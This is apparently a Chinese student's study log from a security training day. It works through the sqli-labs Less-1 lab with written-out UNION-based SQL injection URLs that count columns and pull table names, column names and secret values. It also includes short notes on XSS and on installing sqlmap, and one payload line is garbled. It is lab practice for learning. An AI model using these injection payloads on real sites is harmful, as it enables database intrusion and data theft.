2019-07-15

第三天

一、Sqli-lab

(1)4查询报错,所以有3条字段

localhost/sqli-labs-master/Less-1/?id=1'order by 1 %23

localhost/sqli-labs-master/Less-1/?id=1'order by 2 %23

localhost/sqli-labs-master/Less-1/?id=1'order by 3 %23

localhost/sqli-labs-master/Less-1/?id=1'order by 4 %23

2019-07-15_第1张图片

(2)1,2,3中2,3字段显示在网页中,所以2,3字段会被输出

localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 %23


2019-07-15_第2张图片

(3)查找表名

加粗部分可改 改成需要查询数据库的名字

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2, (select group_concat(table_name) from information_schema.tables where table_schema='challenges')--+

2019-07-15_第3张图片

(4)数据表列名

完成3后在4中加粗部分更改数据表表名查找数据表的列名

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2, (select group_concat(column_name) from information_schema.columns where table_name='ozqwr9tg21')--+

2019-07-15_第4张图片

(5)字段值

在了解表名和列名后 加粗部分为列名 ',' 用来分隔数据

加粗倾斜部分为已知数据库数据表的名字可通过(3)步骤查询数据表名

http://localhost/sqli-labs-master/Less-1/?id=-1%E2%80%99union select 1, ?id=-1' union select 1, (select group_concat(column_name) from information_schema.columns where table_name='ozqwr9tg21'),(select concat_ws(',',id,sessid,secret_HMOI,tryy) from challenges.ozqwr9tg21 limit 0,1)--+


2019-07-15_第5张图片
列名字段值一同显示

参考地址:https://www.jianshu.com/p/93e5dad1299c

二、XSS

XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器

执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实

施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨 大的,是web安全的头号大敌。

个人觉得xss是通过burp截取数据包后更改数据表内容从而实现数据欺骗获得用户信息

https://www.cnblogs.com/shawWey/p/8480452.html

https://www.freebuf.com/articles/web/157953.html

三、sqlmap

python27环境安装

https://baijiahao.baidu.com/s?id=1606573927720991570&wfr=spider&for=pc


2019-07-15_第6张图片
2019-07-15_第7张图片

最最最基本的python程序


2019-07-15_第8张图片

sqlmap

2019-07-15_第9张图片

问题:无法输入指令 按下enter后闪退 暂未解决

sqlmap常用参数解释:https://www.cnblogs.com/insane-Mr-Li/p/10150165.html

你可能感兴趣的:(2019-07-15)